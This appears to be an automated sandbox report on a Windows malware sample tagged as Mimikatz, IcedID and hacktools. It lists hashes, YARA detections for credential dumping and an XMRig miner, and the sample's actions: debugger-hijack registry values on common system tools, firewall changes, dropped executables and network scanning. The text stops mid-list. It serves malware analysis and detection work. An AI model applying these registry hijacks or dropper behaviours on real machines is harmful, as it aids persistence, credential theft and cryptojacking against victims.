Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 09:56
Behavioral task
behavioral1
Sample
2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe
-
Size
9.6MB
-
MD5
b94dd0f9743e238e5f43aab46e34ba41
-
SHA1
a8e3c613b799b4ec763168069187e49d32115171
-
SHA256
05a3beccdc6edf638c343391f63105fe335983af6a45315ce7ff0570b1f90911
-
SHA512
d4cd1355b566353f48a0508f0ccedfb6571173afd68b3490dbbe9786c18419409a49684e2849e906b51433968829a7278944d0a9cd5c372025580b4a18755837
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4508 created 1736 4508 lebulsi.exe 37 -
Xmrig family
-
Contacts a large (19308) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4424-177-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-182-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-199-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-209-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-215-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-229-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-246-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-397-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-398-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig behavioral2/memory/4424-401-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4496-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4496-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b73-6.dat mimikatz behavioral2/memory/4320-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2280-138-0x00007FF753B90000-0x00007FF753C7E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File opened for modification C:\Windows\system32\drivers\etc\hosts lebulsi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lebulsi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4576 netsh.exe 2520 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 4320 lebulsi.exe 4508 lebulsi.exe 3460 wpcap.exe 2876 bdltnuisb.exe 2280 vfshost.exe 4668 sadefbibf.exe 3356 xohudmc.exe 1060 zefhau.exe 4424 uuetgf.exe 4780 sadefbibf.exe 2448 sadefbibf.exe 4032 sadefbibf.exe 4152 sadefbibf.exe 4928 sadefbibf.exe 516 sadefbibf.exe 1640 sadefbibf.exe 828 sadefbibf.exe 4636 sadefbibf.exe 224 sadefbibf.exe 872 sadefbibf.exe 704 sadefbibf.exe 1296 sadefbibf.exe 1544 sadefbibf.exe 2760 sadefbibf.exe 2100 sadefbibf.exe 4436 lebulsi.exe 4484 ysesbhsym.exe -
Loads dropped DLL 12 IoCs
pid Process 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 3460 wpcap.exe 2876 bdltnuisb.exe 2876 bdltnuisb.exe 2876 bdltnuisb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content lebulsi.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF lebulsi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\zefhau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF lebulsi.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\zefhau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 lebulsi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache lebulsi.exe -
resource yara_rule behavioral2/files/0x0007000000023c5e-134.dat upx behavioral2/memory/2280-136-0x00007FF753B90000-0x00007FF753C7E000-memory.dmp upx behavioral2/memory/2280-138-0x00007FF753B90000-0x00007FF753C7E000-memory.dmp upx behavioral2/files/0x0007000000023c69-141.dat upx behavioral2/memory/4668-142-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4668-146-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/files/0x0007000000023c66-163.dat upx behavioral2/memory/4424-164-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4780-171-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/2448-175-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-177-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4032-180-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-182-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4152-185-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4928-189-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/516-193-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/1640-197-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-199-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/828-202-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4636-206-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-209-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/224-210-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/872-213-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-215-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/704-218-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/1296-222-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/1544-226-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-229-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/2760-231-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/2100-233-0x00007FF7DB400000-0x00007FF7DB45B000-memory.dmp upx behavioral2/memory/4424-246-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4424-397-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4424-398-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx behavioral2/memory/4424-401-0x00007FF7E8960000-0x00007FF7E8A80000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tucl-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture64.dll lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Result.txt ysesbhsym.exe File opened for modification C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File opened for modification C:\Windows\zthyliniv\Corporate\log.txt cmd.exe File created C:\Windows\zthyliniv\eftbbbiir\wpcap.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libxml2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\vimpcsvc.xml lebulsi.exe File opened for modification C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File opened for modification C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\tibe-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\docmicfg.xml lebulsi.exe File created C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ip.txt lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\libeay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ssleay32.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trch-1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\ucl.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\posh-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\AppCapture32.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\scan.bat lebulsi.exe File opened for modification C:\Windows\seumlgyb\schoedcl.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\trfo-2.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\Shellcode.ini lebulsi.exe File created C:\Windows\zthyliniv\Corporate\vfshost.exe lebulsi.exe File created C:\Windows\zthyliniv\upbdrjv\swrpwe.exe lebulsi.exe File created C:\Windows\ime\lebulsi.exe lebulsi.exe File opened for modification C:\Windows\seumlgyb\lebulsi.exe 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe File created C:\Windows\seumlgyb\lebulsi.exe 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe File created C:\Windows\zthyliniv\UnattendGC\specials\cnli-1.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\wpcap.exe lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\schoedcl.xml lebulsi.exe File created C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\xdvl-0.dll lebulsi.exe File opened for modification C:\Windows\seumlgyb\vimpcsvc.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimilib.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe lebulsi.exe File created C:\Windows\seumlgyb\spoolsrv.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\docmicfg.exe lebulsi.exe File opened for modification C:\Windows\seumlgyb\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\zlib1.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\vimpcsvc.xml lebulsi.exe File created C:\Windows\seumlgyb\svschost.xml lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\Packet.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\coli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\crli-0.dll lebulsi.exe File created C:\Windows\zthyliniv\UnattendGC\specials\exma-1.dll lebulsi.exe File created C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe lebulsi.exe File created C:\Windows\seumlgyb\docmicfg.xml lebulsi.exe File created C:\Windows\zthyliniv\Corporate\mimidrv.sys lebulsi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1636 sc.exe 4620 sc.exe 1840 sc.exe 2308 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zefhau.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 